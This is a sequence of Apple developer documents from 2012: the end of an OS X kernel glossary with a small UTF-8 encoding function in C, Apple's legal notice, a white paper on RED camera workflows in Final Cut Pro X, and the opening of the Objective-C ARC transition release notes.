symmetric multiprocessing See SMP (symmetric multiprocessing).

task A Mach abstraction, consisting of a virtual address space and a port namespace. A task itself performs no computation; rather, it is the framework in which threads run. See also thread.

task port A kernel port that represents a task and is used to manipulate that task. See also kernel port; thread port.

TCP/IP (Transmission Control Protocol/Internet Protocol) An industry standard protocol used to deliver messages between computers over the network. TCP/IP is the primary networking protocol used in OS X.

thread The unit of program execution. A thread consists of a program counter, a set of registers, and a stack pointer. See also task.

thread port A kernel port that represents a thread and is used to manipulate that thread. See also kernel port; task port.

thread-safe code Code that can be executed safely by multiple threads simultaneously.

time-sharing policy In Mach, a scheduling policy in which a thread’s priority is raised and lowered to balance its resource consumption against other timesharing threads.

UDF (Universal Disk Format) The file system format used in DVD disks.

UFS (UNIX file system) An industry standard file system format used in UNIX and similar operating systems such as BSD. UFS in OS X is a derivative of 4.4BSD UFS.
Unicode A character set that defines unique character codes (code points) for characters in a wide range of languages. Unlike ASCII, which defines 128 distinct characters typically represented in 8 bits, Unicode was originally designed as a 16-bit set with as many as 65,536 distinct characters; the current standard extends the range to U+10FFFF, which covers the characters used in most of the world’s writing systems.

universal binaries Executable files containing object code for more than one machine architecture.

UPL (universal page list) A data structure used when communicating with the virtual memory system. UPLs can be used to change the behavior of pages with respect to caching, permissions, mapping, and so on.

USB (Universal Serial Bus) A multiplatform bus standard that can support up to 127 peripheral devices, including printers, digital cameras, keyboards and mice, and storage devices.

UTF-8 (Unicode Transformation Format 8) A format used to represent a sequence of Unicode characters with an equivalent sequence of 8-bit bytes (one to four bytes per character), none of which is zero unless the character itself is the NUL character. This sequence of bytes can be represented using an ordinary C language string.

VFS (virtual file system) A set of standard internal file-system interfaces and utilities that facilitate support for additional file systems. VFS provides an infrastructure for file systems built into the kernel.

virtual address An address as viewed from the perspective of an application. Each task has its own range of virtual addresses, beginning at address zero. The Mach VM system makes the CPU hardware map these addresses onto physical memory. See also physical address.

virtual memory A system in which addresses as seen by software are not the same as addresses seen by the hardware. This provides support for memory protection, reduces the need for code relocatability, and allows the operating system to provide the illusion to each application that it has resources much larger than those that could actually be backed by RAM.

VM See virtual memory.
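To make the UTF-8 entry above concrete, here is a minimal sketch in C of how a single Unicode code point can be turned into UTF-8 bytes. The function name `utf8_encode` is an assumption made for this illustration and is not a kernel or Core Foundation API. The sketch covers the full current code point range (up to U+10FFFF) and rejects surrogate values, which are not valid characters on their own.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper (not a system API): encodes one Unicode code point
 * as UTF-8 into out, which must have room for 4 bytes.
 * Returns the number of bytes written, or 0 if cp cannot be encoded
 * (a surrogate value, or a value above U+10FFFF). */
size_t utf8_encode(uint32_t cp, unsigned char out[4])
{
    if (cp < 0x80) {                       /* 1 byte: plain ASCII */
        out[0] = (unsigned char)cp;
        return 1;
    }
    if (cp < 0x800) {                      /* 2 bytes: 110xxxxx 10xxxxxx */
        out[0] = (unsigned char)(0xC0 | (cp >> 6));
        out[1] = (unsigned char)(0x80 | (cp & 0x3F));
        return 2;
    }
    if (cp < 0x10000) {                    /* 3 bytes: 1110xxxx 10xxxxxx 10xxxxxx */
        if (cp >= 0xD800 && cp <= 0xDFFF)  /* surrogates are not characters */
            return 0;
        out[0] = (unsigned char)(0xE0 | (cp >> 12));
        out[1] = (unsigned char)(0x80 | ((cp >> 6) & 0x3F));
        out[2] = (unsigned char)(0x80 | (cp & 0x3F));
        return 3;
    }
    if (cp <= 0x10FFFF) {                  /* 4 bytes: 11110xxx then three 10xxxxxx */
        out[0] = (unsigned char)(0xF0 | (cp >> 18));
        out[1] = (unsigned char)(0x80 | ((cp >> 12) & 0x3F));
        out[2] = (unsigned char)(0x80 | ((cp >> 6) & 0x3F));
        out[3] = (unsigned char)(0x80 | (cp & 0x3F));
        return 4;
    }
    return 0;
}
```

Every byte produced for a code point other than U+0000 has at least one bit set, which is why the encoded text can be stored in an ordinary NUL-terminated C string.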
vnode An in-memory data structure containing information about a file.

vnode pager In Mach, one of the built-in pagers. The vnode pager maps files into memory objects. See also default pager; pager.

work loop The main loop of an application or KEXT that waits repeatedly for incoming events and dispatches them.

XML (Extensible Markup Language) A dialect of SGML (Standard Generalized Markup Language), XML provides a metalanguage containing rules for constructing specialized markup languages. XML users can create their own tags, making XML very flexible.

Apple Inc.
© 2002, 2012 Apple Inc. All rights reserved.

No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apple’s copyright notice.

No licenses, express or implied, are granted with respect to any of the technology described in this document. Apple retains all intellectual property rights associated with the technology described in this document. This document is intended to assist application developers to develop applications only for Apple-labeled computers.

Apple Inc.
1 Infinite Loop
Cupertino, CA 95014
408-996-1010

Apple, the Apple logo, AppleTalk, Carbon, Cocoa, Finder, FireWire, Keychain, Logic, Mac, Mac OS, Macintosh, Objective-C, OS X, Pages, Panther, Power Mac, Quartz, QuickTime, Spaces, and Xcode are trademarks of Apple Inc., registered in the U.S. and other countries. .Mac is a service mark of Apple Inc., registered in the U.S. and other countries. NeXT and OPENSTEP are trademarks of NeXT Software, Inc., registered in the U.S.
and other countries. DEC is a trademark of Digital Equipment Corporation. Intel and Intel Core are registered trademarks of Intel Corporation or its subsidiaries in the United States and other countries. Java is a registered trademark of Oracle and/or its affiliates. OpenGL is a registered trademark of Silicon Graphics, Inc. PowerPC and the PowerPC logo are trademarks of International Business Machines Corporation, used under license therefrom. SPEC is a registered trademark of the Standard Performance Evaluation Corporation (SPEC). UNIX is a registered trademark of The Open Group.

Even though Apple has reviewed this document, APPLE MAKES NO WARRANTY OR REPRESENTATION, EITHER EXPRESS OR IMPLIED, WITH RESPECT TO THIS DOCUMENT, ITS QUALITY, ACCURACY, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE. AS A RESULT, THIS DOCUMENT IS PROVIDED “AS IS,” AND YOU, THE READER, ARE ASSUMING THE ENTIRE RISK AS TO ITS QUALITY AND ACCURACY.

IN NO EVENT WILL APPLE BE LIABLE FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES RESULTING FROM ANY DEFECT OR INACCURACY IN THIS DOCUMENT, even if advised of the possibility of such damages.

THE WARRANTY AND REMEDIES SET FORTH ABOVE ARE EXCLUSIVE AND IN LIEU OF ALL OTHERS, ORAL OR WRITTEN, EXPRESS OR IMPLIED. No Apple dealer, agent, or employee is authorized to make any modification, extension, or addition to this warranty.

Some states do not allow the exclusion or limitation of implied warranties or liability for incidental or consequential damages, so the above limitation or exclusion may not apply to you. This warranty gives you specific legal rights, and you may also have other rights which vary from state to state.

RED Workflows with Final Cut Pro X
White Paper
June 2012

With the continuing popularity of the RED® family of cameras (www.red.com), Final Cut Pro X editors have been looking for proven workflows with REDCODE® RAW files.
This white paper outlines how professional production companies are achieving excellent results when recording with RED cameras, editing in Final Cut Pro X, and finishing in applications such as DaVinci Resolve.

This document outlines a complete RED-based post-production workflow, following the steps below:
1. Transcode REDCODE RAW files to Apple ProRes using REDCINE-X® PRO.
2. Batch sync audio and video files.
3. Import synced files into Final Cut Pro X. During import, Final Cut Pro X can automatically create lightweight Apple ProRes 422 (Proxy) files for editing. Or, if you have a lot of footage and multiple editors, you can use Compressor to create the Apple ProRes 422 (Proxy) files.
4. Edit and lock picture with Final Cut Pro X.
5. Export an XML file of the project from Final Cut Pro X.
6. Color grade the project in DaVinci Resolve using either high-quality Apple ProRes or R3D RAW files. You can relink the project XML file to the original R3D files in either REDCINE-X PRO or DaVinci Resolve.
7. Export an XML file from DaVinci Resolve and import it back into Final Cut Pro X.
8. Export a final master from Final Cut Pro X.

This method combines the best of both worlds: the speed of editing with Apple ProRes on a wide variety of notebook and desktop systems, and the color grading advantages of RAW when finishing. You can further simplify this workflow by transcoding to high-quality Apple ProRes files and using those throughout color grading and delivery.

The sections below include additional detail about each stage of the workflow.

Transcode REDCODE RAW Files to Apple ProRes

RED cameras record a RAW file (R3D) that must be “debayered” and decompressed to convert the original sensor data to viewable pixels, so that the file can play back in video editing software. Apple ProRes is an excellent choice for this conversion, because it’s a codec optimized for both quality and editing speed.
Apple ProRes is a full frame size, intra-frame codec designed to efficiently use multiple processors for playback and rendering. The free RED application REDCINE-X PRO supports Apple ProRes encoding, which can be accelerated using the RED ROCKET® card. REDCINE-X PRO also allows you to apply a “one-light” color correction during the transcoding process, giving your footage a more finished look for editing and review.

In the Field

As workflows expand to include field review and even rough cut editing, digital imaging technicians (DITs) are actively transcoding R3D footage to Apple ProRes using high-end portable systems. A typical field-based workflow includes these steps:
• Copy the footage from the camera’s recording medium, like the REDMAG™ removable solid-state drive (SSD).
• Create backups so that camera originals can be stored in two different places for data protection.
• Create Apple ProRes dailies by transcoding the R3D files to Apple ProRes files for editing and H.264 files for uploading to a secure website for client review.

Alternatively, after making backup copies, you can deliver the R3D files to the post facility for transcoding to Apple ProRes dailies.

Choose Transcoding Settings

When you transcode your files to Apple ProRes, choose the level of quality that’s appropriate to your specific production.

Workflow                                                                      Apple ProRes codec
Disk space is a consideration, or you’re editing a large multicam project.    Apple ProRes 422 (Proxy) or Apple ProRes 422 (LT)
You’re delivering Apple ProRes files as a final master for the web or TV.     Apple ProRes 422 or Apple ProRes 422 (HQ)
You’re delivering for theater projection or effects compositing.              Apple ProRes 4444

Although you can transcode to the final delivery quality and then work with that throughout post-production, it’s more efficient to work with smaller frame sizes and higher image compression during the craft edit.
So even though you may have shot at 4K or 5K resolution in the field, you can transcode to a smaller frame size to save time and disk space. For example, you can set the resolution to 1920x1080 or 1280x720, and you can set the debayer quality to 1/4.

If you’re generating Apple ProRes files for use as proxy media, you can also choose to superimpose, or “burn in,” the source timecode and filename over the image. This makes it easy to go back to the original R3D files at any point during post-production for a quick visual double-check that the files are correct. For more details, see the REDCINE-X PRO manual at https://www.red.com/downloads.

Note: You can speed up transcoding by using a RED ROCKET card, which offloads the processor-intensive debayer and decompression tasks from software to custom hardware. RED ROCKET can be a valuable tool when transcoding a large number of shots.

Apply One-Light Color Correction

When recording with RED cameras, it’s common to shoot a scene “flat” to avoid clipping highlights and shadows and provide more flexibility when manipulating images in post-production. This recording setup can give the footage a washed-out appearance. Many editors and clients prefer working with more visually appealing images that include higher contrast and color saturation. To accommodate this workflow, the free REDCINE-X PRO application allows you to add a one-light color correction as part of the transcoding process. You can choose from several presets to create more common looks, or you can create your own look.

Be sure to keep the original names of the R3D files when you generate new Apple ProRes media so that you can easily relink to them later. After you apply the one-light color correction during transcoding, it stays with the image until you go back to the original R3D file and create a new Apple ProRes version.
Batch Sync Audio and Video Files

After all your media has been transcoded, you can choose to sync second-source audio to the video files. You can sync the files directly in Final Cut Pro X using the built-in synchronization feature that analyzes waveforms to match the scratch audio in your video files to the high-quality audio from your field recorder. You can also use a third-party application like Intelligent Assistance’s Sync-N-Link X (www.intelligentassistance.com), RED’s REDCINE-X PRO (www.red.com/learn), or Singular Software’s PluralEyes (www.singularsoftware.com). Simply select all the audio and Apple ProRes video files and batch sync. Then export the XML to Final Cut Pro X, and all of the synced material is imported into an event, ready for editing.

Import Files into Final Cut Pro X

After creating Apple ProRes files with REDCINE-X PRO, you can import these files directly into Final Cut Pro X. Even if you transcode R3D files to a high-quality Apple ProRes codec, such as Apple ProRes 4444, you may still choose to use lightweight Apple ProRes 422 (Proxy) files for editing. Final Cut Pro X allows you to generate Apple ProRes proxy files in the background and seamlessly switch to these files for editing, providing great flexibility when editing on a notebook, for example.

To create proxy files while importing media
1. In Final Cut Pro, choose File > Import > Files.
2. Select a file or folder, or Command-click to select multiple files to import.
3. Do one of the following:
   • To add the imported files to an existing event: Select “Add to existing Event,” and choose the event from the pop-up menu.
   • To create a new event: Select “Create new Event,” type a name in the text field, and choose the disk where you want to store the event from the “Save to” pop-up menu.
4. To have Final Cut Pro copy your media files and add them to the Final Cut Pro Events folder you specified, select the “Copy files to Final Cut Events folder” checkbox.
   If you’re working with a SAN and want to keep the files in a central location and have multiple users link to them, leave this option unselected. For more information, see Final Cut Pro X: Xsan Best Practices.
5. Select the “Create proxy media” checkbox.
   When this option is selected, Final Cut Pro creates Apple ProRes 422 (Proxy) files in the background after the media files are imported. You can begin to edit your project and, when the proxy files are created, you can open Playback preferences and switch to the proxy files with a single click.
6. Click Import.

Final Cut Pro imports your media in the background, and then creates proxy files in the background. You can view the progress of the background tasks in the Background Tasks window. You can now begin editing, even if importing and transcoding are not yet complete.

To switch to the Apple ProRes proxy files, select “Use proxy media” in Final Cut Pro Playback preferences. It’s just as easy to switch back to the original media when the creative editing is finished and you want to work on color or effects at the highest quality. When you change these settings, all media in events and projects is affected.

Edit in Final Cut Pro X and Export XML

After all your media has been imported into Final Cut Pro X, you can edit just as you would any other project. The application was designed for modern, file-based workflows, making it easy to browse, organize, and edit large amounts of material. Use skimming to quickly view your footage. Mark range-based keywords and favorites, and save custom searches as Smart Collections. Quickly and easily arrange clips in the Timeline and add titles and effects, which render in the background as you work.

When you’re finished editing, you can send your project to a third-party finishing system such as DaVinci Resolve. Just select the project in the Project Library, choose File > Export XML, and select a location to save the XML file.
Color Grade in DaVinci Resolve and Export XML

Choose Apple ProRes or RAW for Grading

Before importing the Final Cut Pro X XML file into DaVinci Resolve, you should choose between a few different color grading workflows. If you edited with Apple ProRes 422 (HQ) or Apple ProRes 4444 in Final Cut Pro X, you may want to grade these same files in DaVinci Resolve.

Alternatively, you can relink the project to the original R3D files in either DaVinci Resolve or REDCINE-X PRO. These RAW files offer a wide range of values to use when grading, which can help improve the look of images that were shot without extensive lighting control or that need a unique style. You can get more image detail out of the highlights and shadows, which is why so many colorists choose to use the RAW files in the color grading stage.

To relink to the original R3D media in DaVinci Resolve
1. In DaVinci Resolve Preferences, add the location of the R3D files to the Media Storage Volumes list.
2. Save the preferences and reopen DaVinci Resolve.
3. On the Browse page, import the R3D files to the Media Pool.
4. On the Conform page, in the Timeline Management section, click the Load button.
5. Select the XML file that you exported from Final Cut Pro X.
6. In the Load XML window, deselect “Automatically import source clips into media pool.”
7. Choose any other options that are applicable to your project, and click OK.

The XML file is imported and relinked to the corresponding media in the Media Pool using reel name and timecode. A new session appears in the Timeline Management list, and the edit appears in the Timeline.

Note: Alternatively, if you’re working with large amounts of media and DaVinci Resolve 8.1 or later, you can have DaVinci Resolve relink to the R3D files automatically when you import the XML file.
Just be sure to select the following checkboxes:
• Automatically import source clips into media pool
• Ignore file extensions when matching

Render New Media

After color grading the final project in DaVinci Resolve, you can choose the render format based on your final delivery. For example, you may choose to render Apple ProRes 4444 for theater projection, or Apple ProRes 422 if you’re delivering a master for the web or TV. You may want to set a handle length for the rendered media (at least one second), so that you can make additional changes such as adding a longer dissolve or extending an edit. For more details, see the DaVinci Resolve manual at http://www.blackmagic-design.com/support.

Export XML from DaVinci Resolve and Import into Final Cut Pro X

After you render the media in DaVinci Resolve, you can transfer the project back to Final Cut Pro X by exporting an XML file.

To export an XML file from DaVinci Resolve
1. Open the Conform page and, in the Timeline Management list, select the session you want to export an XML file from.
2. Click the Export button at the bottom of the Timeline Management list.
3. In the Export XML dialog, choose FCP X XML 1.1 Files from the Format pop-up menu, type a name and choose a location for the exported XML file, and click Save.

An XML version of that session is saved, complete with internal references to the graded media you rendered, and ready for importing into Final Cut Pro X.

Import the XML file back into Final Cut Pro X using the Import XML command in the File menu. Make sure that you’re linking to the high-quality media by selecting “Use original or optimized media” in the Playback pane of the Final Cut Pro Preferences window.

Now you can add finished audio, adjust titles, insert graphics, and continue to make editorial changes. Because you’ve imported the individual media files and the XML metadata instead of a single QuickTime movie, you can make changes right up to the last minute before delivery.
For information about Final Cut Pro X, see Final Cut Pro X Help.

Export a Master from Final Cut Pro X

The final step in the workflow is to export a finished master from Final Cut Pro X.

To export your project as a master file
1. To make sure the project’s render format is set to the quality level you want for the final master, select the project in the Project Library, click the Inspector button in the toolbar, and click the Project Properties button. The Render Format pop-up menu shows the current render codec.
2. Select the project in the Project Library and choose Share > Export Media (or press Command-E).
3. Choose an option from the Export pop-up menu. The default setting, Video and Audio, creates a movie file containing both video and audio. For information about the other options, see Final Cut Pro X Help.
   To export a file that matches the project’s properties, choose Current Settings from the “Video codec” pop-up menu. When you export using Current Settings, the final master is exported at the quality of the render settings, and the export is as fast as a file copy with no further compression added.
4. To see details about the file that will be output, click Summary.
5. Click Next, type a name and choose a location for the exported file, and click Save.

If you’re exporting for review on the web, you can export an H.264 version directly to a private account on YouTube or Vimeo. You can also burn the project to a DVD, or to a Blu-ray disc if you have a third-party Blu-ray burner.

If you have Compressor installed, you can choose Share > Send to Compressor to transfer your project to that application for total control over your final export settings. Compressor also allows you to set up render clusters that use the processors of multiple computers on a network. Create a Compressor droplet for drag-and-drop simplicity, or create custom export settings to match unique delivery requirements.

If you need to output to tape, all three major video I/O device manufacturers offer free software to support tape delivery. The applications are AJA’s VTR Xchange, Blackmagic Design’s Media Express, and Matrox’s Vetura. Download the application that works with your video I/O device and use the QuickTime export from Final Cut Pro X to lay back to tape.

Conclusion

Using Apple ProRes for editing and R3D RAW files for color grading enables a highly flexible workflow optimized for speed, quality, and creative control. This process also takes advantage of the metadata and XML capabilities of Final Cut Pro X, which have been designed for the future of file-based production. By using this document as a template for working with RED and Final Cut Pro X, editors and post-production facilities can further customize the process to suit their unique needs.

Copyright © 2012 Apple Inc. All rights reserved. Apple, the Apple logo, Final Cut, Final Cut Pro, QuickTime, and Xsan are trademarks of Apple Inc., registered in the U.S. and other countries. R3D, RED, REDCINE, REDCINE-X, REDCODE, REDMAG, and RED ROCKET are trademarks or registered trademarks of Red.com, Inc. in the United States and other countries. The YouTube logo is a trademark of Google Inc. Other product and company names mentioned herein may be trademarks of their respective companies. Mention of third-party products is for informational purposes only and constitutes neither an endorsement nor a recommendation. Apple assumes no responsibility with regard to the performance or use of these products. Product specifications are subject to change without notice. 019-2378 June 2012
Transitioning to ARC Release Notes
2012-07-17 | © 2012 Apple Inc. All Rights Reserved.

Contents
Transitioning to ARC Release Notes
Summary
ARC Overview
ARC Enforces New Rules
ARC Introduces New Lifetime Qualifiers
ARC Uses a New Statement to Manage Autorelease Pools
Patterns for Managing Outlets Become Consistent Across Platforms
Stack Variables Are Initialized with nil
Use Compiler Flags to Enable and Disable ARC
Managing Toll-Free Bridging
The Compiler Handles CF Objects Returned From Cocoa Methods
Cast Function Parameters Using Ownership Keywords
Common Issues While Converting a Project
Frequently Asked Questions
Document Revision History

Automatic Reference Counting (ARC) is a compiler feature that provides automatic memory management of Objective-C objects. Rather than having to think about retain and release operations, ARC allows you to concentrate on the interesting code, the object graphs, and the relationships between objects in your application.

[Figure: manual reference counting compared with Automatic Reference Counting, showing the proportion of application code to retain/release code and the time to produce each.]

Summary

ARC works by adding code at compile time to ensure that objects live as long as necessary, but no longer. Conceptually, it follows the same memory management conventions as manual reference counting (described in Advanced Memory Management Programming Guide) by adding the appropriate memory management calls for you.

In order for the compiler to generate correct code, ARC restricts the methods you can use and how you use toll-free bridging (see “Toll-Free Bridged Types”). ARC also introduces new lifetime qualifiers for object references and declared properties.
ARC is supported in Xcode 4.2 for OS X v10.6 and v10.7 (64-bit applications) and for iOS 4 and iOS 5. Weak references are not supported in OS X v10.6 and iOS 4.

Xcode provides a tool that automates the mechanical parts of the ARC conversion (such as removing retain and release calls) and helps you to fix issues the migrator can’t handle automatically (choose Edit > Refactor > Convert to Objective-C ARC). The migration tool converts all files in a project to use ARC. You can also choose to use ARC on a per-file basis if it’s more convenient for you to use manual reference counting for some files.

See also:
● Advanced Memory Management Programming Guide
● Memory Management Programming Guide for Core Foundation

ARC Overview

Instead of you having to remember when to use retain, release, and autorelease, ARC evaluates the lifetime requirements of your objects and automatically inserts appropriate memory management calls for you at compile time. The compiler also generates appropriate dealloc methods for you. In general, if you’re only using ARC, the traditional Cocoa naming conventions are important only if you need to interoperate with code that uses manual reference counting.

A complete and correct implementation of a Person class might look like this:

    @interface Person : NSObject
    @property NSString *firstName;
    @property NSString *lastName;
    @property NSNumber *yearOfBirth;
    @property Person *spouse;
    @end

    @implementation Person
    @end

(Object properties are strong by default; the strong attribute is described in “ARC Introduces New Lifetime Qualifiers” (page 7).)
Using ARC, you could implement a contrived method like this:

    - (void)contrived {
        Person *aPerson = [[Person alloc] init];
        [aPerson setFirstName:@"William"];
        [aPerson setLastName:@"Dudney"];
        [aPerson setYearOfBirth:[[NSNumber alloc] initWithInteger:2011]];
        NSLog(@"aPerson: %@", aPerson);
    }

ARC takes care of memory management so that neither the Person nor the NSNumber objects are leaked.

You could also safely implement a takeLastNameFrom: method of Person like this:

    - (void)takeLastNameFrom:(Person *)person {
        NSString *oldLastName = [self lastName];
        [self setLastName:[person lastName]];
        NSLog(@"Lastname changed from %@ to %@", oldLastName, [self lastName]);
    }

ARC ensures that oldLastName is not deallocated before the NSLog statement.

ARC Enforces New Rules

To work, ARC imposes some new rules that are not present when using other compiler modes. The rules are intended to provide a fully reliable memory management model; in some cases, they simply enforce best practice, in some others they simplify your code or are obvious corollaries of your not having to deal with memory management. If you violate these rules, you get an immediate compile-time error, not a subtle bug that may become apparent at runtime.

● You cannot explicitly invoke dealloc, or implement or invoke retain, release, retainCount, or autorelease.
  The prohibition extends to using @selector(retain), @selector(release), and so on.
  You may implement a dealloc method if you need to manage resources other than releasing instance variables. You do not have to (indeed you cannot) release instance variables, but you may need to invoke [systemClassInstance setDelegate:nil] on system classes and other code that isn’t compiled using ARC.
  Custom dealloc methods in ARC do not require a call to [super dealloc] (it actually results in a compiler error). The chaining to super is automated and enforced by the compiler.
  You can still use CFRetain, CFRelease, and other related functions with Core Foundation-style objects (see “Managing Toll-Free Bridging” (page 12)).
● You cannot use NSAllocateObject or NSDeallocateObject.
  You create objects using alloc; the runtime takes care of deallocating objects.
● You cannot use object pointers in C structures.
  Rather than using a struct, you can create an Objective-C class to manage the data instead.
● There is no casual casting between id and void *.
  You must use special casts that tell the compiler about object lifetime. You need to do this to cast between Objective-C objects and Core Foundation types that you pass as function arguments. For more details, see “Managing Toll-Free Bridging” (page 12).
● You cannot use NSAutoreleasePool objects.
  ARC provides @autoreleasepool blocks instead. These have an advantage of being more efficient than NSAutoreleasePool.
● You cannot use memory zones.
  There is no need to use NSZone any more; zones are ignored by the modern Objective-C runtime anyway.

To allow interoperation with manual retain-release code, ARC imposes a constraint on method naming:

● You cannot give an accessor a name that begins with new. This in turn means that you can’t, for example, declare a property whose name begins with new unless you specify a different getter:

    // Won't work:
    @property NSString *newTitle;

    // Works:
    @property (getter=theNewTitle) NSString *newTitle;

ARC Introduces New Lifetime Qualifiers

ARC introduces several new lifetime qualifiers for objects, and weak references. A weak reference does not extend the lifetime of the object it points to, and automatically becomes nil when there are no strong references to the object.

You should take advantage of these qualifiers to manage the object graphs in your program.
In particular, ARC does not guard against strong reference cycles (previously known as retain cycles; see “Practical Memory Management”). Judicious use of weak relationships will help to ensure you don’t create cycles.

Property Attributes

The keywords weak and strong are introduced as new declared property attributes, as shown in the following examples.

    // The following declaration is a synonym for: @property(retain) MyClass *myObject;
    @property(strong) MyClass *myObject;

    // The following declaration is similar to "@property(assign) MyClass *myObject;"
    // except that if the MyClass instance is deallocated,
    // the property value is set to nil instead of remaining as a dangling pointer.
    @property(weak) MyClass *myObject;

Under ARC, strong is the default for object types.

Variable Qualifiers

You use the following lifetime qualifiers for variables just like you would, say, const.

    __strong
    __weak
    __unsafe_unretained
    __autoreleasing

● __strong is the default. An object remains “alive” as long as there is a strong pointer to it.
● __weak specifies a reference that does not keep the referenced object alive. A weak reference is set to nil when there are no strong references to the object.
● __unsafe_unretained specifies a reference that does not keep the referenced object alive and is not set to nil when there are no strong references to the object. If the object it references is deallocated, the pointer is left dangling.
● __autoreleasing is used to denote arguments that are passed by reference (id *) and are autoreleased on return.

You should decorate variables correctly. When using qualifiers in an object variable declaration, the correct format is:

    ClassName * qualifier variableName;

for example:

    MyClass * __weak myWeakReference;
    MyClass * __unsafe_unretained myUnsafeReference;

Other variants are technically incorrect but are “forgiven” by the compiler.
To understand the issue, see http://cdecl.org/.

Take care when using __weak variables on the stack. Consider the following example:

    NSString * __weak string = [[NSString alloc] initWithFormat:@"First Name: %@", [self firstName]];
    NSLog(@"string: %@", string);

Although string is used after the initial assignment, there is no other strong reference to the string object at the time of assignment; it is therefore immediately deallocated. The log statement shows that string has a null value. (The compiler provides a warning in this situation.)

You also need to take care with objects passed by reference. The following code will work:

    NSError *error;
    BOOL OK = [myObject performOperationWithError:&error];
    if (!OK) {
        // Report the error.
        // ...

However, the error declaration is implicitly:

    NSError * __strong error;

and the method declaration would typically be:

    -(BOOL)performOperationWithError:(NSError * __autoreleasing *)error;

The compiler therefore rewrites the code:

    NSError * __strong error;
    NSError * __autoreleasing tmp = error;
    BOOL OK = [myObject performOperationWithError:&tmp];
    error = tmp;
    if (!OK) {
        // Report the error.
        // ...

The mismatch between the local variable declaration (__strong) and the parameter (__autoreleasing) causes the compiler to create the temporary variable. You can get the original pointer by declaring the parameter id __strong * when you take the address of a __strong variable. Alternatively you can declare the variable as __autoreleasing.

Use Lifetime Qualifiers to Avoid Strong Reference Cycles

You can use lifetime qualifiers to avoid strong reference cycles. For example, if you have a graph of objects arranged in a parent-child hierarchy, and parents need to refer to their children and vice versa, you typically make the parent-to-child relationship strong and the child-to-parent relationship weak.
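The parent-child arrangement can be sketched roughly as follows. This is a minimal illustration, not code from the release notes: the TreeNode class, its children and parent properties, and the addChild: method are all hypothetical names, and the sketch assumes it is compiled with -fobjc-arc on a runtime that supports weak references.

```objc
#import <Foundation/Foundation.h>

// Hypothetical class for illustration only; not part of the original document.
@interface TreeNode : NSObject
// Parent-to-child: strong, so a parent keeps its children alive.
@property (strong) NSMutableArray *children;
// Child-to-parent: weak, so a child never keeps its parent alive
// and the back pointer becomes nil when the parent is deallocated.
@property (weak) TreeNode *parent;
- (void)addChild:(TreeNode *)child;
@end

@implementation TreeNode
@synthesize children = _children;
@synthesize parent = _parent;

- (id)init {
    self = [super init];
    if (self) {
        _children = [NSMutableArray array];
    }
    return self;
}

- (void)addChild:(TreeNode *)child {
    // Only the array entry is an owning reference; the back pointer is weak,
    // so no strong reference cycle is formed between parent and child.
    child.parent = self;
    [self.children addObject:child];
}
@end
```

With this shape, releasing the last strong reference to a parent is enough for ARC to free the whole subtree, because no child holds its parent strongly.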
Other situations may be more subtle, particularly when they involve block objects.

In manual reference counting mode, __block id x; has the effect of not retaining x. In ARC mode, __block id x; defaults to retaining x (just like all other values). To get the manual reference counting mode behavior under ARC, you could use __unsafe_unretained __block id x;. As the name __unsafe_unretained implies, however, having a non-retained variable is dangerous (because it can dangle) and is therefore discouraged. Two better options are to either use __weak (if you don’t need to support iOS 4 or OS X v10.6), or set the __block value to nil to break the retain cycle.

The following code fragment illustrates this issue using a pattern that is sometimes used in manual reference counting.

    MyViewController *myController = [[MyViewController alloc] init…];
    // ...
    myController.completionHandler = ^(NSInteger result) {
        [myController dismissViewControllerAnimated:YES completion:nil];
    };
    [self presentViewController:myController animated:YES completion:^{
        [myController release];
    }];

As described, instead, you can use a __block qualifier and set the myController variable to nil in the completion handler:

    MyViewController * __block myController = [[MyViewController alloc] init…];
    // ...
    myController.completionHandler = ^(NSInteger result) {
        [myController dismissViewControllerAnimated:YES completion:nil];
        myController = nil;
    };

Alternatively, you can use a temporary __weak variable. The following example illustrates a simple implementation:

    MyViewController *myController = [[MyViewController alloc] init…];
    // ...
    MyViewController * __weak weakMyViewController = myController;
    myController.completionHandler = ^(NSInteger result) {
        [weakMyViewController dismissViewControllerAnimated:YES completion:nil];
    };

For non-trivial cycles, however, you should use:

    MyViewController *myController = [[MyViewController alloc] init…];
    // ...
    MyViewController * __weak weakMyController = myController;
    myController.completionHandler = ^(NSInteger result) {
        MyViewController *strongMyController = weakMyController;
        if (strongMyController) {
            // ...
            [strongMyController dismissViewControllerAnimated:YES completion:nil];
            // ...
        }
        else {
            // Probably nothing...
        }
    };

In some cases you can use __unsafe_unretained if the class isn’t __weak compatible. This can, however, become impractical for nontrivial cycles because it can be hard or impossible to validate that the __unsafe_unretained pointer is still valid and still points to the same object in question.

ARC Uses a New Statement to Manage Autorelease Pools

Using ARC, you cannot manage autorelease pools directly using the NSAutoreleasePool class. Instead, you use @autoreleasepool blocks:

    @autoreleasepool {
        // Code, such as a loop that creates a large number of temporary objects.
    }

This simple structure allows the compiler to reason about the reference count state. On entry, an autorelease pool is pushed. On normal exit (break, return, goto, fall-through, and so on) the autorelease pool is popped. For compatibility with existing code, if exit is due to an exception, the autorelease pool is not popped.

This syntax is available in all Objective-C modes. It is more efficient than using the NSAutoreleasePool class; you are therefore encouraged to adopt it in place of NSAutoreleasePool.
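As a rough sketch of the loop case mentioned in the comment above, a pool can be placed inside the loop body so that temporaries created in one iteration can be reclaimed before the next begins. The function name TotalLengthOfTemporaryStrings and the "item-N" strings are hypothetical and chosen only for illustration.

```objc
#import <Foundation/Foundation.h>

// Hypothetical helper for illustration: builds `count` short-lived strings
// and returns the sum of their lengths.
static NSUInteger TotalLengthOfTemporaryStrings(NSUInteger count) {
    NSUInteger total = 0;
    for (NSUInteger i = 0; i < count; i++) {
        // A pool is pushed on entry to the block and popped on normal exit,
        // so any object autoreleased during this iteration does not
        // accumulate across the whole loop.
        @autoreleasepool {
            NSString *temp = [NSString stringWithFormat:@"item-%lu", (unsigned long)i];
            total += [temp length];
        }
    }
    return total;
}
```

Only scalar results (here, total) are carried out of the pool; an object created inside the block and needed afterward would have to be assigned to a strong variable declared outside it.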
Patterns for Managing Outlets Become Consistent Across Platforms

